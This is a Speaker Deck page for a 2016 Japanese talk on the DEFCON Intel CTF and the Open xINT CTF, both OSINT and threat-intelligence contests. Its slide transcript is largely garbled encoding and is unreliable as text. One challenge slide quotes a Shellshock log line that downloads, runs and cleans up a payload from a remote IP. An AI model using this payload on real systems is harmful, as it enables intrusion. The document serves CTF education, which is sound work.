Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Intel CTF and Open xINT CTF 20161220
Search
Yuho Kameda
December 20, 2016
Technology
1
1.2k
Intel CTF and Open xINT CTF 20161220
OSINTのCTFに参加して開催した話で! 2016/12/20 #ssmjp
Yuho Kameda
December 20, 2016
Tweet
Share
More Decks by Yuho Kameda
See All by Yuho Kameda
How to use OWASP ZAP & Vulnerabilities Slikmap
ykame
0
8.8k
Enjoy Daily Life by handy tool
ykame
0
93
Find Trust-Information -Public- 20170630 #ssmjp
ykame
1
2.4k
Hey Siri! Hello Barbie! ssmjp
ykame
0
870
How to create the alert by script of ZAP
ykame
2
670
[bpstudy] OWASP ZAP Vulnerable Assesment.
ykame
2
1.3k
What is ZAP?
ykame
0
490
MINI Hardening #1.2 20分LT ZAPを使ったHardening対策術 2015/8/29
ykame
2
520
How to install VMwarePlayer and OWASP BWA
ykame
1
950
Other Decks in Technology
See All in Technology
飲食店データの分析事例とそれを支えるデータ基盤
kimujun
0
180
インフラとバックエンドとフロントエンドをくまなく調べて遅いアプリを早くした件
tubone24
1
430
オープンソースAIとは何か? --「オープンソースAIの定義 v1.0」詳細解説
shujisado
10
1.2k
[CV勉強会@関東 ECCV2024 読み会] オンラインマッピング x トラッキング MapTracker: Tracking with Strided Memory Fusion for Consistent Vector HD Mapping (Chen+, ECCV24)
abemii
0
230
Incident Response Practices: Waroom's Features and Future Challenges
rrreeeyyy
0
160
『Firebase Dynamic Links終了に備える』 FlutterアプリでのAdjust導入とDeeplink最適化
techiro
0
140
Security-JAWS【第35回】勉強会クラウドにおけるマルウェアやコンテンツ改ざんへの対策
4su_para
0
180
Lambdaと地方とコミュニティ
miu_crescent
2
370
アプリエンジニアのためのGraphQL入門.pdf
spycwolf
0
100
AI前提のサービス運用ってなんだろう?
ryuichi1208
8
1.4k
IBC 2024 動画技術関連レポート / IBC 2024 Report
cyberagentdevelopers
PRO
1
110
VideoMamba: State Space Model for Efficient Video Understanding
chou500
0
190
Featured
See All Featured
Measuring & Analyzing Core Web Vitals
bluesmoon
4
130
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
33
1.9k
Mobile First: as difficult as doing things right
swwweet
222
8.9k
VelocityConf: Rendering Performance Case Studies
addyosmani
325
24k
Building Better People: How to give real-time feedback that sticks.
wjessup
364
19k
Music & Morning Musume
bryan
46
6.2k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
250
21k
Making the Leap to Tech Lead
cromwellryan
133
8.9k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
10
720
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
38
1.8k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
26
2.1k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
Transcript
OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz
ࣗݾհ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ༰
WebΞϓϦέʔγϣϯ੬ऑੑஅ ϓϥοτϑΥʔϜ੬ऑੑஅ SOC/CSIRTۀ ۓٸҊ݅ͳΜͰཁһ… ใऩू
ࠓ͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠
DEFCONͰIntel CTFʹ ࢀՃͨ͠
DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTFίϯςετ͕͋ΔϋοΧʔ ͷࡇయ
DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015͔Β࢝·ͬͨɺIntelligenceʹযΛͯͨ ڝٕ ୈ2ճ(2016)ͷςʔϚɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ
͍ͯ͘͠աఔͰ༷ʑͳΛճ͢Δ ༏উۚ$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ12ҐͰͨ͠
Intel CTFͷ݁Ռ
ͲΜͳ͕͋ͬͨͷʔʁ 1 The Vuln: What is the vulnerability that was
successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ͑ʮBashdoorʯ
ͦͷଞͷ <Level1> ϚϧΣΞͷ௨৴ઌʁ ߈ܸݩIPͷASN(Autonomous System Number)ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯʁ <Level2> ϚϧΣΞͷ໊લʁ ༻͕ແޮԽ͞Ε͍ͯΔ໊ؔʁ
Ϙοτͷ໊લʁ Bot Harder͕༻Δ͢ΔMaildropʁ
ଞʹ͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀిͯ͠ใࡡऔ͢Δڝٕ Black Badge͑Δۄίϯςετ blog.yka.me Ͱɺ2015ͷใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html
AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠
AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!
Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔͷCTFຊͰΓ͍ͨͰ͢Ͷʯ ʮձࣾؔͩͱ༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00
Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖ 8/12 Call For Xఏग़done
࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩
Open xINT CTFͱʁ http://xintctf.wpblog.jp/ ձͰͷؔऀͷฉ͖ࠐΈSNSͳͲͰඞཁͳใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱͷεύΠཆίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ)
߈ܸऀ(ϋοΧʔ) ৮ USB୳ࡧґཔ USBʹ᠘ΛࠐΜͰ৮ ಠࣗʹௐࠪ
7 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨεʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧϯτʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧϯτ ʁ
5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV TokyoͰ৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV TokyoͰʮϞϊʯΛͤ
͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰԠͷ͋ͬͨۙΛ୳͢
ৄ͘͠ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTFͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup
http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a
ࢀՃऀ : 93ਓ 1Ͱղ͚ͨਓ : 67ਓճ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4:
28ਓɺ5: 7ਓ
࠷ऴతͳ݁Ռʁ (700Ҏ্) [߹ܭ + εύΠಘ + ࠷ऴճ࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900
+ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ໊ͱҰக͠ͳ͍ํεύΠಘ͕0ͱͳΓ·͢ ಉͷ߹ɺ࠷ऴճ͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢